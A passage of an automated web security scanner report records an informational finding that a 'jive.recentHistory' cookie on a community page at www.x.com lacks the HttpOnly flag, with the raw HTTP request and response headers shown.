Set-Cookie: jive.recentHistory.-1=31342c323133313b31342c323030343b31342c323033393b31342c323034303b31342c323131343b31342c323133333b31342c323032353b31342c323033343b31342c323032333b31342c323032343b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:10 GMT; Path=/
Vary: User-Agent
JP: D=70307 t=1313157070898066
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.28. https://www.x.com/community/ppx/global/de  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/global/de

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/global/de HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:12 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323034323b31342c323133313b31342c323034313b31342c323034303b31342c323030343b31342c323033393b31342c323131343b31342c323133333b31342c323032353b31342c323033343b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:12 GMT; Path=/
Vary: User-Agent
JP: D=91052 t=1313157072186357
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...